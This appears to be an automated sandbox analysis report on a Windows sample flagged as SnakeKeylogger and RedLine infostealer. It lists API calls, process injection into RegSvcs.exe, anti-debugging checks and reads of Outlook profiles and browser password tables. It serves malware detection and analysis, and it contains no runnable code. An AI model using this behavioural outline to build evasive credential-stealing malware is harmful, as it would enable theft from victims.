                Source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066CE7A GetLastError,FormatMessageW,0_2_0066CE7A
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065AB84 AdjustTokenPrivileges,CloseHandle,0_2_0065AB84
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0065B134
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0066E1FD
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00666532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00666532
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0067C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0067C18C
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0062406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0062406B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeFile created: C:\Users\user\AppData\Local\Temp\aut63EE.tmpJump to behavior
                Source: nfKqna8HuC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000002.00000002.3303484774.000000000318B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000317C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000319A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: nfKqna8HuC.exeVirustotal: Detection: 56%
                Source: nfKqna8HuC.exeReversingLabs: Detection: 83%
                Source: unknownProcess created: C:\Users\user\Desktop\nfKqna8HuC.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"Jump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: nfKqna8HuC.exeStatic file information: File size 1147392 > 1048576
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: nfKqna8HuC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: nfKqna8HuC.exe, 00000000.00000003.2055618022.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, nfKqna8HuC.exe, 00000000.00000003.2056531512.0000000003B70000.00000004.00001000.00020000.00000000.sdmp
                Source: nfKqna8HuC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: nfKqna8HuC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: nfKqna8HuC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: nfKqna8HuC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: nfKqna8HuC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063E01E LoadLibraryA,GetProcAddress,0_2_0063E01E
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006A2409 push 00000000h; iretd 0_2_006A240B
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006A2410 push 00000000h; retf 0_2_006A2413
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063288B push 66006323h; retn 0069h0_2_006328E1
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00646B05 push ecx; ret 0_2_00646B18
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006AB9D8 push 00000000h; iretd 0_2_006AB9DA
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006AB985 push 00000000h; ret 0_2_006AB98A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041BFCD pushad ; ret 2_2_0041BFCE
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00688111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00688111
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0063EB42
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0064123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0064123A
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeAPI/Special instruction interceptor: Address: 14DFBD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeEvaded block: after key decisiongraph_0-94475
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeEvaded block: after key decisiongraph_0-95469
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeAPI coverage: 4.5 %
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00666CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00666CA9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006660DD
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006663F9
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066EB60
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066F56F FindFirstFileW,FindClose,0_2_0066F56F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066F5FA
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00671B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00671B2F
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00671C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00671C8A
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00671F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00671F94
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0063DDC0
                Source: RegSvcs.exe, 00000002.00000002.3301839819.0000000000E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeAPI call chain: ExitProcess graph end nodegraph_0-94255
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00676AAF BlockInput,0_2_00676AAF
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00623D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00623D19
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00653920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00653920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0063E01E LoadLibraryA,GetProcAddress,0_2_0063E01E
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_014DE7F0 mov eax, dword ptr fs:[00000030h]0_2_014DE7F0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_014DFE40 mov eax, dword ptr fs:[00000030h]0_2_014DFE40
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_014DFEA0 mov eax, dword ptr fs:[00000030h]0_2_014DFEA0
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0065A66C
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006481AC
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00648189 SetUnhandledExceptionFilter,0_2_00648189
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C3D008Jump to behavior
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0065B106 LogonUserW,0_2_0065B106
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_00623D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00623D19
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_0066411C SendInput,keybd_event,0_2_0066411C
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeCode function: 0_2_006674E7 mouse_event,0_2_006674E7
                Source: C:\Users\user\Desktop\nfKqna8HuC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"Jump to behavior
